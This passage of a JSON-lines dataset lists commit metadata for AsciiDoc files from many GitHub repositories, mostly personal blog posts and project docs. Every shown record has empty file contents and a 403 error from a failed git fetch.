common-gradle snippet","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-gradle.adoc","new_file":"src\/main\/docs\/common-gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68aa0b6d969ab5caf7e727e35524dc25e1c16397","subject":"Update 2014-09-16-Disqus-comments-with-Frog.adoc","message":"Update 2014-09-16-Disqus-comments-with-Frog.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-Disqus-comments-with-Frog.adoc","new_file":"_posts\/2014-09-16-Disqus-comments-with-Frog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae9ba3560f405e82cab76edef0f5041a610cd99e","subject":"Adding a new test document","message":"Adding a new test document\n","repos":"NicolasGeraud\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,mojavelinux\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin","old_file":"src\/test\/resources\/src\/asciidoctor\/sample-embedded.adoc","new_file":"src\/test\/resources\/src\/asciidoctor\/sample-embedded.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"676838c99c359e45ce0f9f3014eb68a75e7121e1","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3abe06819e27f43d16f1e65403c3ba0bbd800468","subject":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b9214f7964e2d5a97b9034f9426123d144655a","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 
2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af125af01b14a5a8d052d2edbf7a5ae6f61f4e50","subject":"Delete 2015-06-08-My-title2.adoc","message":"Delete 2015-06-08-My-title2.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title2.adoc","new_file":"_posts\/2015-06-08-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151d01f734a21f7f53772115e26fef4ba86c2b27","subject":"Update 2016-12-02-Ruby-Tips.adoc","message":"Update 2016-12-02-Ruby-Tips.adoc","repos":"railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io","old_file":"_posts\/2016-12-02-Ruby-Tips.adoc","new_file":"_posts\/2016-12-02-Ruby-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/railsdev\/railsdev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fefe752a0f0df3dbb61aad0327689ed54a62552","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b3ada08b4da47c8a30232ff77ee67cd599d95ec","subject":"Create payment-control-plugins.adoc","message":"Create payment-control-plugins.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-control-plugins.adoc","new_file":"userguide\/payment\/includes\/payment-control-plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc4be348a81d79fb22de2cfb254d279abfd2c5c4","subject":"Added Set Header EIP to docs","message":"Added Set Header EIP to 
docs\n","repos":"kevinearls\/camel,Fabryprog\/camel,apache\/camel,zregvart\/camel,tdiesler\/camel,punkhorn\/camel-upstream,adessaigne\/camel,curso007\/camel,tdiesler\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,anoordover\/camel,snurmine\/camel,jamesnetherton\/camel,cunningt\/camel,onders86\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,dmvolod\/camel,DariusX\/camel,jonmcewen\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,dmvolod\/camel,jonmcewen\/camel,CodeSmell\/camel,gnodet\/camel,mcollovati\/camel,alvinkwekel\/camel,dmvolod\/camel,akhettar\/camel,kevinearls\/camel,apache\/camel,jonmcewen\/camel,ullgren\/camel,Fabryprog\/camel,tdiesler\/camel,pax95\/camel,curso007\/camel,Fabryprog\/camel,tadayosi\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,dmvolod\/camel,gautric\/camel,adessaigne\/camel,dmvolod\/camel,sverkera\/camel,mcollovati\/camel,onders86\/camel,CodeSmell\/camel,curso007\/camel,jamesnetherton\/camel,apache\/camel,sverkera\/camel,jonmcewen\/camel,cunningt\/camel,anoordover\/camel,zregvart\/camel,adessaigne\/camel,mcollovati\/camel,pax95\/camel,snurmine\/camel,jonmcewen\/camel,akhettar\/camel,davidkarlsen\/camel,onders86\/camel,davidkarlsen\/camel,pmoerenhout\/camel,anoordover\/camel,objectiser\/camel,curso007\/camel,christophd\/camel,alvinkwekel\/camel,tadayosi\/camel,curso007\/camel,christophd\/camel,DariusX\/camel,christophd\/camel,snurmine\/camel,kevinearls\/camel,anoordover\/camel,zregvart\/camel,gautric\/camel,snurmine\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,snurmine\/camel,CodeSmell\/camel,anoordover\/camel,kevinearls\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,jonmcewen\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,Fabryprog\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,ullgren\/camel,tadayosi\/camel,sverkera\/camel,akhettar\/camel,nikhilvibhav\/camel,cunningt\/camel,christophd\/camel,pax95\/camel,gnodet\/camel,anoordover\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,DariusX\/camel,davidkarlsen\/camel,apache\/camel,ullgren\/camel,tadayosi\/camel,pmoerenhout\/camel,zregvart\/camel,adessaigne\/camel,curso007\/camel,tadayosi\/camel,objectiser\/camel,sverkera\/camel,CodeSmell\/camel,akhettar\/camel,punkhorn\/camel-upstream,gautric\/camel,jamesnetherton\/camel,pax95\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,akhettar\/camel,akhettar\/camel,sverkera\/camel,gautric\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,gautric\/camel,alvinkwekel\/camel,davidkarlsen\/camel,pax95\/camel,jamesnetherton\/camel,onders86\/camel,jamesnetherton\/camel,onders86\/camel,pmoerenhout\/camel,ullgren\/camel,jamesnetherton\/camel,kevinearls\/camel,nicolaferraro\/camel,dmvolod\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setHeader-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c97f34a2180fd27d95a010566d415cd98003d78d","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 
2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25876f386dd86a8eebe5ebfa50976ad7a3662f64","subject":"Update 2015-05-12-Hi-all.adoc","message":"Update 2015-05-12-Hi-all.adoc","repos":"envyen\/blog,envyen\/blog,envyen\/blog","old_file":"_posts\/2015-05-12-Hi-all.adoc","new_file":"_posts\/2015-05-12-Hi-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/envyen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c0f3e84da5f2f4c966fdca4f86a051c5a370256","subject":"Update 2015-08-20-sample.adoc","message":"Update 2015-08-20-sample.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-08-20-sample.adoc","new_file":"_posts\/2015-08-20-sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b3ada08a6ba4cd55483968719f7621fea137db","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bbe5296e79a2d2111b5391471119680645201dd","subject":"add first iteration of docs","message":"add first iteration of docs\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Idea.adoc","new_file":"docs\/Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"931210608f941ec6b7ba6bfb55edd0cb0188ea4d","subject":"update NOTES.adoc","message":"update NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbee3392638def595b423db683646b742fa97a70","subject":"added js howto documentation based on DolphinJumpStart js sample","message":"added js howto documentation based on DolphinJumpStart js 
sample\n","repos":"canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/guide\/howtoWeb\/howtoStep4.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/guide\/howtoWeb\/howtoStep4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5547edc0cfa96719eb90a9b284fc50ef1b96e5cd","subject":"\u2026 including BP","message":"\u2026 including BP\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Best practices.adoc","new_file":"Git\/Best practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d31cc3b9475582a4d4fd8cc0d47d7f6e11bc90","subject":"Update 2017-01-20-notification-Google-Apps-Script.adoc","message":"Update 2017-01-20-notification-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc28c5d8bdf9821687933dbc25502d173149e08f","subject":"Renamed '_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc' to '_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc'","message":"Renamed '_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc' to '_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_file":"_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76dd4839548eb9e07d58f470c0f62be6aa68f240","subject":"Update 2015-05-05-First-Post.adoc","message":"Update 2015-05-05-First-Post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2015-05-05-First-Post.adoc","new_file":"_posts\/2015-05-05-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8778ee7e88446097e1d02937a896d389a0240cf","subject":"Update 
2015-02-13-Cocoa-chan.adoc","message":"Update 2015-02-13-Cocoa-chan.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-02-13-Cocoa-chan.adoc","new_file":"_posts\/2015-02-13-Cocoa-chan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ee73800916472ec13a7e0fecbcd8c9230f72ce","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc9ad4ec7f1509b543f2d821f3eeb8723c36d00b","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97fb04648c48d800efdaec10e5ac15a5128d3016","subject":"Renamed '_posts\/2017-08-17-IDE.adoc' to '_posts\/2017-08-17-Speedy-IDE.adoc'","message":"Renamed '_posts\/2017-08-17-IDE.adoc' to '_posts\/2017-08-17-Speedy-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f998ddd71b31c4c331bf956372f17d9046c796fc","subject":"Update 2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","message":"Update 2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","new_file":"_posts\/2016-04-19-Second-release-of-svg2css-and-Using-it-to-build-a-Donkey-Kong-stage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04d431551fe4668ed7a868027d90347e2268ef88","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 
2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2fa1ab06eca2d21398dba3a2ac8646cec5a80cc","subject":"Update 2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","message":"Update 2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","new_file":"_posts\/2016-04-23-M-I-T-launches-experimental-10000-bug-bounty-programme-for-students.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce16e7569944e775a12e912fc0094d259f313a3","subject":"Update 2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","message":"Update 2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","new_file":"_posts\/2016-08-24-Why-I-Drive-a-40-years-old-Car-and-What-It-Had-Taught-Me-About-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fb15f73c2ab31ea0b9ab031ee30f0c7f34485c2","subject":"Update 2009-04-25-XML-binding-with-JAXB-13.adoc","message":"Update 2009-04-25-XML-binding-with-JAXB-13.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-25-XML-binding-with-JAXB-13.adoc","new_file":"_posts\/2009-04-25-XML-binding-with-JAXB-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda9ea5882389bcfec2d99883236b9d57305c15d","subject":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 
2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5b3a4de4978b5e53d7b6a7c143823fee60a97d2","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f7fbb714217207d3aaefbf102085793ae637a4","subject":"Update 2016-08-27-Laravel-52-basic-auth.adoc","message":"Update 2016-08-27-Laravel-52-basic-auth.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-27-Laravel-52-basic-auth.adoc","new_file":"_posts\/2016-08-27-Laravel-52-basic-auth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84665ed713cf559e4565ede8325c156e049f7418","subject":"Update 2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","message":"Update 2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","new_file":"_posts\/2018-04-01-License-Scan-Maven-Plugin-audit-licenses-in-your-dependencies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1119a1828567e43db31b9a39d56cd0fe93ffa3c3","subject":"Create jql.adoc","message":"Create jql.adoc","repos":"tripattern\/howtos,tripattern\/howtos,tripattern\/howtos","old_file":"atlassian\/jql.adoc","new_file":"atlassian\/jql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tripattern\/howtos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"314dbd1d9dcf12834701e6790111dd3f8e4f2c0b","subject":"Add a few words about the current features","message":"Add a few words about the current 
features\n","repos":"archiloque\/external-memory,archiloque\/external-memory,archiloque\/external-memory","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/archiloque\/external-memory.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d8c4dc7aee984521f4fc1eefb0a8ddd96928e1e","subject":"Create initial README","message":"Create initial README","repos":"clyfe\/twixt,AvisoNovate\/twixt,AvisoNovate\/twixt,clyfe\/twixt,clyfe\/twixt,AvisoNovate\/twixt","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clyfe\/twixt.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10def5964a6c0f99fd38230e1a66b899d3233656","subject":"Update 2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","message":"Update 2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","new_file":"_posts\/2014-08-17-Funcao-Social-for-Dummies-ou-Registraram-um-dominio-e-nao-usam-E-agora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0a5006d126117d7083f6bd8eeb5a75c4c092510","subject":"Update 2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","message":"Update 2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","new_file":"_posts\/2012-01-30-Exclure-certaines-classes-de-la-couverture-des-tests-unitaires.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdb3e4604bdd13242b52b813289cf630478a3eeb","subject":"Update 2016-02-20-Toy-Story-Midway-Mania-closing-March-15-Third-track-opening-this-summer.adoc","message":"Update 